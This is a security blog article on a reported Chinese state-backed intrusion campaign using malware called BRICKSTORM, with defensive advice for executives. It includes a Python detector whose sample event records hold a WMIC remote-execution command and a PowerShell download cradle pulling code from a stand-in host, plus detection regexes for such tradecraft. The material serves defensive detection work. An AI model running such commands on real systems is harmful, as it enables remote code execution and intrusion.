**PRC Hackers Use BRICKSTORM for Persistent US System Access**
**Introduction**
What if a high-level state-backed threat actor had been hiding in your systems for over five years? According to a December 2025 report from CISA, this isn’t hypothetical anymore—it’s our current reality. A Chinese government-backed hacking group, identified as Volt Typhoon, has been using a sophisticated malware toolkit called “BRICKSTORM” to infiltrate and persist within critical U.S. infrastructure systems undetected since at least 2021 ([source](https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html)).
The implications are serious: these aren’t one-off cyberattacks—they’re long-term intrusions aimed at quietly establishing control over government networks, defense contractors, transportation, and energy sectors. For CISOs, CEOs, and infosec leaders, the message is clear: our adversaries are not only building cyber weapons; they are staging them for real-world impact.
In this article, we’ll break down what BRICKSTORM is, how these attackers operate undetected for years, and what security leaders like you can do right now to shore up your defenses. You’ll leave with a better understanding of the threat landscape, plus actionable strategies to detect and prevent persistent access from advanced actors like Volt Typhoon.
—
**How BRICKSTORM Works: Built for Stealth and Longevity**
The most alarming characteristic of BRICKSTORM is its meticulous focus on persistence and invisibility within target environments. This isn’t smash-and-grab malware. It’s crafted for covert operations and long-term access.
According to CISA’s report, BRICKSTORM leverages Living Off the Land (LotL) techniques, abusing native system tools like WMIC, PowerShell, and scheduled tasks to blend in with normal activity. This allows the malware to operate without triggering typical endpoint alerts or behavioral anomalies. Volt Typhoon isn’t just infiltrating networks—they’re living in them and watching carefully.
Moreover, BRICKSTORM avoids dropping traditional binaries. Instead, it operates almost entirely in memory, which means it leaves minimal forensic footprints and can survive routine system security scans.
Some specific tactics observed include:
– **Abuse of administrator credentials** to move laterally across systems
– **Proxies and VPNs** hosted on compromised small office/home office (SOHO) routers to mask traffic
– **Custom-built stealth modules** that evade antivirus detection
This type of operation is resource-intensive and carefully planned, signaling not just a skilled hacking group but one with state-level funding and long-term strategic objectives.
**Key takeaway**: Traditional antivirus and EDR tools are not sufficient on their own. You need advanced telemetry, behavior analysis, and a disciplined incident response plan to detect and neutralize LotL-based attacks.
—
**Why We Keep Missing These Intrusions: Visibility and Gaps in Detection**
One reason attacks like BRICKSTORM flourish is the wide detection gap in many enterprise environments. While many organizations have invested heavily in perimeter firewalls, endpoint security, and even SIEMs, visibility is often fragmented—and attackers are exploiting that.
Here are some of the common blind spots:
– **Insufficient logging**: Many organizations don’t enable detailed PowerShell or command-line logging, which means they miss signals.
– **Fragmented response structures**: Incident response isn’t unified across departments, creating delays in threat containment.
– **Under-secured edge devices**: Volt Typhoon has been known to use unpatched routers and IoT devices as pivot points. These devices are rarely monitored.
According to Mandiant, it takes an average of 273 days to identify a covert state-backed intrusion from initial compromise to detection. That’s nearly nine months of dwell time—enough for attackers to study your architecture, exfiltrate data, or plant secondary malware strains.
**Actionable steps for improved visibility**:
– Enable **centralized, timestamped logging** across user and admin activities
– Monitor **PowerShell and script execution** in real-time
– Perform proactive **packet inspection at network egress points**
– Audit and secure **out-of-band or unmanaged devices**, especially VPNs and modems
**Key takeaway**: Adopt an assume-breach mentality. Operate as if attackers are already in your environment—and make their every move as observable as possible.
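As an added illustration (not code from the CISA report or from this article), here is a small Python detector that runs over constructed, forwarded-style Windows event records to flag the LotL patterns described above (WMIC remote execution, scheduled-task creation, suspicious PowerShell) and to surface accounts whose flagged activity spans more than one host. Event IDs 4688 (process creation with command line) and 4104 (PowerShell script block logging) are real Windows event IDs and only exist if the logging from the steps above is enabled; the hosts, accounts and command lines are constructed samples.

```python
import re

# Constructed sample records in the shape of centrally forwarded Windows
# Security (4688) and PowerShell Operational (4104) events. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "event_id": 4688, "user": "CORP\\jdoe",
     "cmdline": "C:\\Windows\\System32\\notepad.exe"},
    {"host": "ws01", "event_id": 4688, "user": "CORP\\svc_backup",
     "cmdline": 'wmic /node:fs02 process call create "cmd.exe /c whoami"'},
    {"host": "fs02", "event_id": 4688, "user": "CORP\\svc_backup",
     "cmdline": "schtasks /create /tn Updater /tr powershell.exe /sc daily"},
    {"host": "fs02", "event_id": 4104, "user": "CORP\\svc_backup",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
]

# (rule name, event id the rule applies to, pattern over the command line or
# script block). These mirror the native-tool abuse the article calls out.
LOTL_RULES = [
    ("wmic_remote_exec", 4688,
     re.compile(r"\bwmic\b.*/node:.*process\s+call\s+create", re.I)),
    ("schtasks_create", 4688, re.compile(r"\bschtasks\b.*/create", re.I)),
    ("ps_encoded_or_hidden", 4688,
     re.compile(r"powershell.*(-enc|-e\s|-w\s*hidden|windowstyle\s+hidden)", re.I)),
    # 4104 only exists when Script Block Logging is turned on.
    ("ps_download_cradle", 4104,
     re.compile(r"(downloadstring|downloadfile|invoke-expression|\biex\b)", re.I)),
]


def scan_events(events):
    """Return (host, user, rule) triples for every event matching a LotL rule."""
    findings = []
    for ev in events:
        text = ev.get("cmdline") or ev.get("script_block") or ""
        for name, event_id, pattern in LOTL_RULES:
            if ev["event_id"] == event_id and pattern.search(text):
                findings.append((ev["host"], ev["user"], name))
    return findings


def lateral_movement_accounts(findings):
    """Accounts whose flagged LotL activity touches more than one host: the
    'administrator credentials used to move laterally' pattern."""
    hosts_by_user = {}
    for host, user, _rule in findings:
        hosts_by_user.setdefault(user, set()).add(host)
    return {user for user, hosts in hosts_by_user.items() if len(hosts) > 1}


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for host, user, rule in hits:
        print(f"{host:6} {user:18} {rule}")
    print("accounts active on multiple hosts:", lateral_movement_accounts(hits))
```

In production these rules need tuning against your own administrative baseline (legitimate scheduled-task deployment, for instance) so that the signal is the unusual account-and-host combination rather than the tool name alone.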
—
**Next Steps for CISOs and CEOs: Moving from Awareness to Action**
The BRICKSTORM revelations demand more than just concern—they call for structural adjustments and executive-level prioritization. Here’s where leadership needs to focus:
**1. Executive Buy-In for Threat Hunting**
Direct threat hunting initiatives must be embraced at the CISO and CEO level. It’s not enough to run quarterly pen tests or compliance checks. What Volt Typhoon proves is that adept threat actors play the long game. Investing in continuous detection, deception technologies (like honeypots), and threat hunting teams is essential.
**2. Expanded Security Controls for Critical Sectors**
If your organization plays any role in national infrastructure—even tangentially—you must implement sector-specific controls. This includes:
– Adhering to **CISA Sector Risk Management Agency (SRMA)** guidelines
– Conducting **regular segmentation audits**
– Limiting **admin privilege propagation** across systems
**3. Employee and Vendor Security Awareness**
BRICKSTORM’s success also depended on initial credential harvesting—often made easier through phishing, weak passwords, or third-party integrations. You must strengthen this layer.
Recommendations:
– Enforce **multi-factor authentication (MFA)** universally
– Train staff on **identifying social engineering tactics**
– Assess third-party vendors for security hygiene
**Key takeaway**: Defense is a leadership issue. CISOs must frame these decisions in terms of business continuity and national risk, not just IT policy.
—
**Conclusion**
The discovery of BRICKSTORM isn’t just another event in the parade of cyber threats—it’s a wake-up call. State-sponsored adversaries like Volt Typhoon are already inside the infrastructure that underpins American power, transportation, and defense systems. They’re not just testing—they’re positioning.
As security leaders, our job now is to make these intrusions as difficult, costly, and detectable as possible. We must expand visibility, reduce dwell time, and align our defensive posture with the sophistication of the threats we face.
If you’re a CISO or an executive, now is the time to ask your team: would we detect BRICKSTORM in our environment today? If not, what’s stopping us?
Review your telemetry. Revisit your detection rules. Talk to your incident response leads. And if necessary—bring in outside threat hunters to test your assumptions.
Because when state-sponsored attackers prioritize persistence, our best defense is rapid detection and relentless resistance. Let’s make their presence short-lived.
**Stay informed. Stay prepared. Start now.**
For full details, check the source report from The Hacker News: [CISA Reports PRC Hackers Using BRICKSTORM](https://thehackernews.com/2025/12/cisa-reports-prc-hackers-using.html).